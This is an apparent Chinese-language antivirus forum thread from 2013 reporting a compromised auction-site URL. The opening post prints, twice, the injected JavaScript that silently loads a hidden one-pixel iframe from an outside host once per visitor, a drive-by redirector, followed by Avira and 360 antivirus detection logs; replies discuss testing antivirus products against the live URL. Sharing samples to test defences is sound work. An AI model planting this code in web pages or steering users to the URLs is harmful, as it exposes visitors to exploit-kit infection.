http://www.m2y.info/auction/site_fees.php

显示全部楼层 · 发表于 2013-7-13 06:09:21

function zzzfff() {
var cp = document.createElement('iframe');
cp.src = 'http://wcloud.it/gX8FMHrL.php';
cp.style.position = 'absolute';
cp.style.border = '0';
cp.style.height = '1px';
cp.style.width = '1px';
cp.style.left = '1px';
cp.style.top = '1px';
if (!document.getElementById('cp')) {
document.write('<div id=\'cp\'></div>');
document.getElementById('cp').appendChild(cp);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

function zzzfff() {
var qxuua = document.createElement('iframe');
qxuua.src = 'http://wcloud.it/gX8FMHrL.php';
qxuua.style.position = 'absolute';
qxuua.style.border = '0';
qxuua.style.height = '1px';
qxuua.style.width = '1px';
qxuua.style.left = '1px';
qxuua.style.top = '1px';
if (!document.getElementById('qxuua')) {
document.write('<div id=\'qxuua\'></div>');
document.getElementById('qxuua').appendChild(qxuua);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

<script src='http://www.m2y.info/auction/scripts/moz/editor.js'>
</script>

复制代码

Avira

2013/7/13 上午 06:05 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 764
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/7/13 上午 06:05 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\innovaeditor[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.CZ.23' [virus]
   已採取動作：
   檔案會移動至 '5558ec45.qua' 名稱底下的隔離區目錄。.

2013/7/13 上午 06:05 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\innovaeditor[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.23 [virus]'
   執行的動作：傳輸至掃描程式

2013/7/13 上午 06:05 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\innovaeditor[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.23 [virus]'
   執行的動作：拒絕存取

2013/7/13 上午 06:05 [Web Protection] 發現惡意程式碼
   從 URL "http://www.m2y.info/auction/scripts/innovaeditor.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CZ.23' [virus]。
   已採取動作：已略過

2013/7/13 上午 06:05 [Web Protection] 發現惡意程式碼
   從 URL "http://www.m2y.info/auction/scripts/innovaeditor.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CZ.23' [virus]。
   已採取動作：封鎖的檔案

2013/7/13 上午 06:05 [Web Protection] 發現惡意程式碼
   從 URL "http://www.m2y.info/auction/themes/modern_blue/main.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CZ.23' [virus]。
   已採取動作：封鎖的檔案

2013/7/13 上午 06:05 [Web Protection] 發現惡意程式碼
   從 URL "http://www.m2y.info/auction/themes/modern_blue/main.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CZ.23' [virus]。
   已採取動作：已略過

2013/7/13 上午 06:05 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\site_fees[1].htm 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.26 [virus]'
   執行的動作：拒絕存取

2013/7/13 上午 06:05 [Web Protection] 發現惡意程式碼
   從 URL "http://www.m2y.info/auction/site_fees.php" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CZ.26' [virus]。
   已採取動作：已略過

显示全部楼层 · 发表于 2013-7-13 18:39:28

chrome

显示全部楼层 · 发表于 2013-7-13 19:04:02

a939707506 发表于 2013-7-13 18:39
chrome

你可點擊「高級」的選項，這樣才可以測試你裝的殺軟。

显示全部楼层 · 发表于 2013-7-13 19:13:56

显示全部楼层 · 发表于 2013-7-13 23:38:32

360杀毒实时防护日志

时间                   事件          病毒名称                               处理结果                                           文件
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2013-07-13 23:37:08    发现安全威胁    恶意软件(JS.BlacoleRef.CZ.23)          已删除此文件，如果您发现误删，可从隔离区恢复此文件。    C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\9XNCYLGZ\editor[1].js

2013-07-13 23:37:06    发现安全威胁    恶意软件(JS.BlacoleRef.CZ.23)          已删除此文件，如果您发现误删，可从隔离区恢复此文件。    C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LYPI42F7\innovaeditor[1].js

2013-07-13 23:37:05    发现安全威胁    恶意软件(JS.BlacoleRef.CZ.23)          已删除此文件，如果您发现误删，可从隔离区恢复此文件。    C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\JF8MRZ8T\main[1].js

[已鉴定] http://www.m2y.info/auction/site_fees.php

评分

评分